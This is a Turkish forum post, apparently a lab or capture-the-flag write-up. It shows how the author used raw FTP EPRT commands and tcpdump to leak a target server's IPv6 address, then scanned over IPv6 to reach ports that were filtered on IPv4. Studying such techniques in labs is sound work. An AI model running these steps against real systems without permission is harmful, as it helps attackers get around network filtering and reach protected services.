Geçenlerde rastladım gerçekten baya uğraşmıştım,yaklaşık 11 saat boyunca uğraştıktan sonra rootlamayı başardım sistemi . ilk başta misafir ftp verildi portlar tarandığında bulunan bir kaç portun filtrelenmiş olduğunu farkettim RFC2428 yi kontrol ettiğimde ipv6 üzerinde çalıştığını farkettim ve ipv6 yı alarak verilen portu tekrar taradığımda portların açık olduğunu farkettim sonrasında kullanıcılardan birisine girerek root için çalışmaya başladım , bakalım ipv6 yı nasıl çekmişim gelin;
Kod:
ftp> quote EPRT |1|serverip|2222|
burda quote kullanma sebebim yine bypass EPRT kullandığımda komut hatası yiyordum ama quote sayesinde çalışıyor
Kod:
ftp> quote EPRT |2|fe80::13ed:7f5f:****:45eb|2222|
buraya kendi inset6 adresimi yazıyorum dinlemeye alabilmek için
Kod:
ftp> quote EPRT |1|serverip|2222
tekrardan |1| değişkenine yolluyorum
Kod:
ftp> quote EPRT |2|dead:beef:2::10--|2222
ardından inset6 da |2| yi yolluyorum
ve başka bir terminalde
Kod:
tcpdump -lni tun0 -vvvvvvv ip6
yazarak dinlemeye alıyorum
diyorum ve tcp dumpta gelen değerleri inceliyorum
tcpdump: listening on tun0, link-type RAW (Raw IP), capture size 262144 bytes
15:30:42.486368 IP6 (flowlabel 0xb53b6, hlim 63, next-header TCP (6) payload length: 40) dead:beef::***:56ff:febd:5277.33702 > dead:beef:2::10ab.2222: Flags
ve ipv adresini aldık nmap -6 parametresi ile ipv6 taradığımızda filtreli portları açık olarak görmemiz an meselesidir